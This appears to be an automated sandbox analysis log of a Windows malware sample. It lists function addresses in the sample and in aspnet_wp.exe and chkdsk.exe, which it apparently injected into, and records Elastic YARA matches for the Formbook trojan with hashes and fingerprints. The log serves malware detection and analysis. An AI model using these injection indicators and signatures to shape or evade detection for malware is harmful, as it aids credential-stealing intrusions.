Source: C:\Users\user\Desktop\eNXDCIvEXI.exe	Code function: 0_2_00007FFD9B8905DB	0_2_00007FFD9B8905DB
Source: C:\Users\user\Desktop\eNXDCIvEXI.exe	Code function: 0_2_00007FFD9B895D45	0_2_00007FFD9B895D45
Source: C:\Users\user\Desktop\eNXDCIvEXI.exe	Code function: 0_2_00007FFD9B9B04AB	0_2_00007FFD9B9B04AB
Source: C:\Users\user\Desktop\eNXDCIvEXI.exe	Code function: 0_2_00007FFD9B8908A5	0_2_00007FFD9B8908A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_00401ABA	5_2_00401ABA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_00401000	5_2_00401000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_004028DD	5_2_004028DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_004028E0	5_2_004028E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_00403090	5_2_00403090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_00401200	5_2_00401200
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_00404B97	5_2_00404B97
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_00402BA0	5_2_00402BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0042D543	5_2_0042D543
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0040FD33	5_2_0040FD33
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0041661E	5_2_0041661E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_00416623	5_2_00416623
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_004026AE	5_2_004026AE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_00401EB0	5_2_00401EB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_004026B0	5_2_004026B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_00403750	5_2_00403750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0040FF53	5_2_0040FF53
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0040DFCA	5_2_0040DFCA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0040DFD3	5_2_0040DFD3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_05597571	5_2_05597571
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054E0535	5_2_054E0535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_055A0591	5_2_055A0591
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0557D5B0	5_2_0557D5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_05592446	5_2_05592446
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054D1460	5_2_054D1460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0559F43F	5_2_0559F43F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0558E4F6	5_2_0558E4F6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_05504750	5_2_05504750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054E0770	5_2_054E0770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054DC7C0	5_2_054DC7C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0559F7B0	5_2_0559F7B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_055916CC	5_2_055916CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054FC6E0	5_2_054FC6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_05568158	5_2_05568158
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_055AB16B	5_2_055AB16B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0551516C	5_2_0551516C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054CF172	5_2_054CF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054D0100	5_2_054D0100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0557A118	5_2_0557A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_055981CC	5_2_055981CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_055A01AA	5_2_055A01AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054EB1B0	5_2_054EB1B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054E70C0	5_2_054E70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0558F0CC	5_2_0558F0CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_055970E9	5_2_055970E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0559F0E0	5_2_0559F0E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054CD34C	5_2_054CD34C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0559A352	5_2_0559A352
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0559132D	5_2_0559132D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_055A03E6	5_2_055A03E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054EE3F0	5_2_054EE3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0552739A	5_2_0552739A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_05580274	5_2_05580274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054FB2C0	5_2_054FB2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_055602C0	5_2_055602C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_055812ED	5_2_055812ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054FD2F0	5_2_054FD2F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054E52A0	5_2_054E52A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_05591D5A	5_2_05591D5A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054E3D40	5_2_054E3D40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_05597D73	5_2_05597D73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054EAD00	5_2_054EAD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054FFDC0	5_2_054FFDC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054DADE0	5_2_054DADE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054F8DBF	5_2_054F8DBF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054E0C00	5_2_054E0C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_05559C32	5_2_05559C32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0559FCF2	5_2_0559FCF2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054D0CF2	5_2_054D0CF2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_05580CB5	5_2_05580CB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_05554F40	5_2_05554F40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0559FF09	5_2_0559FF09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_05500F30	5_2_05500F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_05522F28	5_2_05522F28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054D2FC8	5_2_054D2FC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054E1F92	5_2_054E1F92
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0559FFB1	5_2_0559FFB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0555EFA0	5_2_0555EFA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054E0E59	5_2_054E0E59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0559EE26	5_2_0559EE26
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0559EEDB	5_2_0559EEDB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0559CE93	5_2_0559CE93
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054F2E90	5_2_054F2E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054E9EB0	5_2_054E9EB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054E9950	5_2_054E9950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054FB950	5_2_054FB950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054F6962	5_2_054F6962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054E29A0	5_2_054E29A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_055AA9A6	5_2_055AA9A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054E2840	5_2_054E2840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054EA840	5_2_054EA840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0554D800	5_2_0554D800
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0550E8F0	5_2_0550E8F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054E38E0	5_2_054E38E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054C68B8	5_2_054C68B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0559AB40	5_2_0559AB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0559FB76	5_2_0559FB76
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_05596BD7	5_2_05596BD7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_05555BF0	5_2_05555BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0551DBF9	5_2_0551DBF9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054FFB80	5_2_054FFB80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0559FA49	5_2_0559FA49
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_05597A46	5_2_05597A46
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_05553A6C	5_2_05553A6C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0558DAC6	5_2_0558DAC6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054DEA80	5_2_054DEA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_05525AA0	5_2_05525AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0557DAAC	5_2_0557DAAC
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_05200535	12_2_05200535
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_052B7571	12_2_052B7571
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_0529D5B0	12_2_0529D5B0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_052C0591	12_2_052C0591
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_052BF43F	12_2_052BF43F
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_052B2446	12_2_052B2446
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_051F1460	12_2_051F1460
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_052AE4F6	12_2_052AE4F6
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_05200770	12_2_05200770
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_05224750	12_2_05224750
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_052BF7B0	12_2_052BF7B0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_051FC7C0	12_2_051FC7C0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_0521C6E0	12_2_0521C6E0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_052B16CC	12_2_052B16CC
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_051F0100	12_2_051F0100
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_0529A118	12_2_0529A118
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_052CB16B	12_2_052CB16B
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_0523516C	12_2_0523516C
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_051EF172	12_2_051EF172
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_05288158	12_2_05288158
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_052C01AA	12_2_052C01AA
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_0520B1B0	12_2_0520B1B0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_052B81CC	12_2_052B81CC
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_052B70E9	12_2_052B70E9
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_052BF0E0	12_2_052BF0E0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_052070C0	12_2_052070C0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_052AF0CC	12_2_052AF0CC
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_052B132D	12_2_052B132D
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_051ED34C	12_2_051ED34C
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_052BA352	12_2_052BA352
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_0524739A	12_2_0524739A
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_052C03E6	12_2_052C03E6
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_0520E3F0	12_2_0520E3F0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_052A0274	12_2_052A0274
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_052052A0	12_2_052052A0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_052A12ED	12_2_052A12ED
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_0521D2F0	12_2_0521D2F0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_0521B2C0	12_2_0521B2C0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_0520AD00	12_2_0520AD00
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_052B7D73	12_2_052B7D73
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_05203D40	12_2_05203D40
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_052B1D5A	12_2_052B1D5A
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_05218DBF	12_2_05218DBF
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_0521FDC0	12_2_0521FDC0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_051FADE0	12_2_051FADE0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_05279C32	12_2_05279C32
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_05200C00	12_2_05200C00
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_052A0CB5	12_2_052A0CB5
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_052BFCF2	12_2_052BFCF2
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_051F0CF2	12_2_051F0CF2
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_05242F28	12_2_05242F28
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_05220F30	12_2_05220F30
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_052BFF09	12_2_052BFF09
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_05274F40	12_2_05274F40
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_0527EFA0	12_2_0527EFA0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_052BFFB1	12_2_052BFFB1
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_05201F92	12_2_05201F92
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_051F2FC8	12_2_051F2FC8
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_052BEE26	12_2_052BEE26
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_05200E59	12_2_05200E59
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_05209EB0	12_2_05209EB0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_05212E90	12_2_05212E90
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_052BCE93	12_2_052BCE93
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_052BEEDB	12_2_052BEEDB
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_05216962	12_2_05216962
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_05209950	12_2_05209950
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_0521B950	12_2_0521B950
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_052029A0	12_2_052029A0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_052CA9A6	12_2_052CA9A6
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_0526D800	12_2_0526D800
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_05202840	12_2_05202840
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_0520A840	12_2_0520A840
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_051E68B8	12_2_051E68B8
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_052038E0	12_2_052038E0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_0522E8F0	12_2_0522E8F0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_052BFB76	12_2_052BFB76
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_052BAB40	12_2_052BAB40
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_0521FB80	12_2_0521FB80
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_05275BF0	12_2_05275BF0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_0523DBF9	12_2_0523DBF9
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_052B6BD7	12_2_052B6BD7
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_05273A6C	12_2_05273A6C
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_052BFA49	12_2_052BFA49
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_052B7A46	12_2_052B7A46
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_05245AA0	12_2_05245AA0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_0529DAAC	12_2_0529DAAC
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_051FEA80	12_2_051FEA80
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_052ADAC6	12_2_052ADAC6
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_00811110	12_2_00811110
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_008011A4	12_2_008011A4
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_0080C340	12_2_0080C340
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_0080A5D7	12_2_0080A5D7
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_0080A5E0	12_2_0080A5E0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_0080C560	12_2_0080C560
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_00829B50	12_2_00829B50
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_00812C2B	12_2_00812C2B
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_00812C30	12_2_00812C30

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: String function: 05527E54 appears 93 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: String function: 05515130 appears 36 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: String function: 054CB970 appears 250 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: String function: 0554EA12 appears 86 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: String function: 0555F290 appears 103 times
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: String function: 0526EA12 appears 86 times
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: String function: 0527F290 appears 103 times
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: String function: 051EB970 appears 250 times
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: String function: 05247E54 appears 93 times
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: String function: 05235130 appears 36 times

Source: C:\Users\user\Desktop\eNXDCIvEXI.exe

Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7344 -s 1632

Source: eNXDCIvEXI.exe

Static PE information: No import functions for PE file found

Source: eNXDCIvEXI.exe, 00000000.00000002.1886057986.0000021BF6210000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameNativeMethods.dll" vs eNXDCIvEXI.exe
Source: eNXDCIvEXI.exe, 00000000.00000000.1659877675.0000021BF5EA2000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameNativeMethods.dll" vs eNXDCIvEXI.exe
Source: eNXDCIvEXI.exe, 00000000.00000000.1659877675.0000021BF5EA2000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameAgemoyuxemaj2 vs eNXDCIvEXI.exe
Source: eNXDCIvEXI.exe, 00000000.00000002.1880140655.0000021B80340000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameNativeMethods.dll" vs eNXDCIvEXI.exe
Source: eNXDCIvEXI.exe	Binary or memory string: OriginalFilenameNativeMethods.dll" vs eNXDCIvEXI.exe
Source: eNXDCIvEXI.exe	Binary or memory string: OriginalFilenameAgemoyuxemaj2 vs eNXDCIvEXI.exe

Source: 5.2.aspnet_wp.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 5.2.aspnet_wp.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000C.00000002.4130637411.0000000004DC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000C.00000002.4128948206.0000000000800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000C.00000002.4130704581.0000000004E00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
